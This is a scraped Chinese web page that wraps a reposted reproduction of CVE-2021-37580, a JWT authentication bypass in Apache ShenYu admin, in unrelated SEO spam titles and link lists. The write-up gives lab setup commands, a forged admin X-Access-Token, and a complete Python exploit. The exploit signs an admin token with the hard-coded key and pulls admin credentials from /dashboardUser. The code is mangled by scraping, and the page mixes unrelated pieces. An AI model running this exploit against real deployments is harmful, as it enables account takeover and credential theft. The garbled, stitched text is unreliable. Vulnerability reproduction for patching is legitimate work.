当前位置: 首页 > news >正文

滕建建设集团网站免费贴图素材

滕建建设集团网站,免费贴图素材,中天建设集团山西分公司网站,唐山百度做网站多少钱Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议总结 Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现) 漏洞名称 漏洞描述 Apache ShenYu是一个异步的#xff0c;高性能的#x… Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议总结 Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现) 漏洞名称 漏洞描述 Apache ShenYu是一个异步的高性能的跨语言的响应式的API网关Apache ShenYu功能十分强大且易于扩展支持各种语言的http协议同时支持Dubbo、 Spring Cloud、 gRPC、 Motan、 Sofa、 Tars 等协议。2021年11月Apache ShenYu被爆出存在身份认证绕过漏洞攻击者可以通过该漏洞绕过JWT(JSON Web Token)安全认证机制直接进入系统后台。 影响版本 Apache ShenYu 2.3.0 Apache ShenYu 2.4.0 漏洞复现 环境搭建 受害者IP192.168.63.129:9095 攻击者IP192.168.63.1 docker直接拉取环境 docker pull apache/shenyu-admin:2.4.0 docker network create shenyu docker run -d -p 9095:9095 --net shenyu apache/shenyu-admin:2.4.0环境启动后访问http://192.168.63.129:9095即可看到一个shenyu页面说明已成功启动使用admin/123456登录系统。 漏洞利用 创建一个wahaha/wahaha权限为default使用刚创建的用户登录系统。 显示登录用户的角色未配置菜单权限 使用burp抓包,在响应体中返回了token。 更改请求路径为/dashboardUser并在请求头加入X-Access-Token字段成功返回admin的账户和密码。 X-Access-Token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6IndhaGFoYSIsImV4cCI6MTcwMzE0MTE1Nn0.Y0U14VyZ0aQ32Y-YX9tz7LF3qCD_R5GPxP563BOUDEs如果没有获取到普通用户的token可以使用脚本生成admin的token成功获取信息。 pip install PyJWT python cve-2021-37580.py http://192.168.63.129:9095import time from jwt import PyJWTif __name__ __main__:headers {alg: HS256,typ: JWT}salt 2095132720951327exp int(time.time())payload {userName: admin,exp: exp}token PyJWT().encode(payloadpayload, keysalt,algorithmHS256, headersheaders)print(token) 完整的EXP import requests import re import time from jwt import PyJWTdef generateToken():headers {alg: HS256,typ: JWT}salt 2095132720951327exp int(time.time())payload {userName: admin,exp: exp}token PyJWT().encode(payloadpayload, keysalt,algorithmHS256, headersheaders)return tokenif __name__ __main__:import systry:urlsys.argv[1]except:print(Usage: %s http://www.baidu.com)exit(0)if isinstance(url,str):url1 url /dashboardUserheaders {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0,X-Access-Token: generateToken()}try:response requests.get(url1, headersheaders, verifyFalse, timeout3).json()print(response)except:print(没有该漏洞)修复建议 1、升级至最新版本 https://shenyu.apache.org/download/ 总结 payload的意思是使用了一个JWT令牌X-Access-Token对其进行Base64解码可得到攻击者尝试的用户为 userName: admin。由于服务端在使用JWT的时候也没有校验key导致任意能解码的JWT并且只要用户userName的值存在都能通过校验。如果攻击成功在响应头中返回的状态码为200且在响应体中返回query success、userName:、passwprd:字样。
http://www.hkea.cn/news/14514003/

相关文章:

  • 网站首屏高度免费大数据平台
  • 常州市城投建设工程招标有限公司网站宝安网站建设-信科网络
  • 福田网站优化南阳医疗网站制作价格
  • 谷歌云做网站服务器农村电商平台怎么加入
  • 个人博客网站下载南京 做网站
  • 城阳网站开发公司电话上海网页设计公司名单
  • 专业网站建设公司兴田德润信任高哪里有免费的网站域名
  • 哪些行业做网站最重要网站类推广软文怎么写
  • 第一次开票网站建设怎么开设计logo商标
  • WordPress移动站福州网站建设资讯
  • 本地的沈阳网站建设新手做网站
  • 深圳网站营销推广公司电话wordpress一键 centos
  • 服装公司网站首页投资做网站
  • 番禺 建网站 360元百度推广竞价托管
  • dw做网站视频教程经典营销案例100例
  • 网站设计应该遵循的原则网站建设与网页设计是什么
  • 上饶市住房和城乡建设网站广西桂林理工大学
  • 怎么制作网站记事本做网站难还是app难
  • 电梯配件做外贸在哪个网站网站建设与优化推广方案内容
  • 上海周边网站建设网站建设这门课
  • 房产如何做网站政务新网站建设
  • 网站费用多少东莞网络推广外包托管
  • DW做旅游网站模板石家庄住房城乡建设厅网站
  • 湖州吴兴建设局网站html代码查看
  • 国外做健康的网站哈尔滨seo优化软件
  • 电子商务系统的组成太原整站优化
  • 上海微信网站建设费用如何制作网站赚钱
  • 残疾人无障碍网站建设网络渠道有哪些
  • 做网站运营的要求参考消息电子版在线阅读
  • 重庆市建设工程造价管理总站浦江网站建设微信开发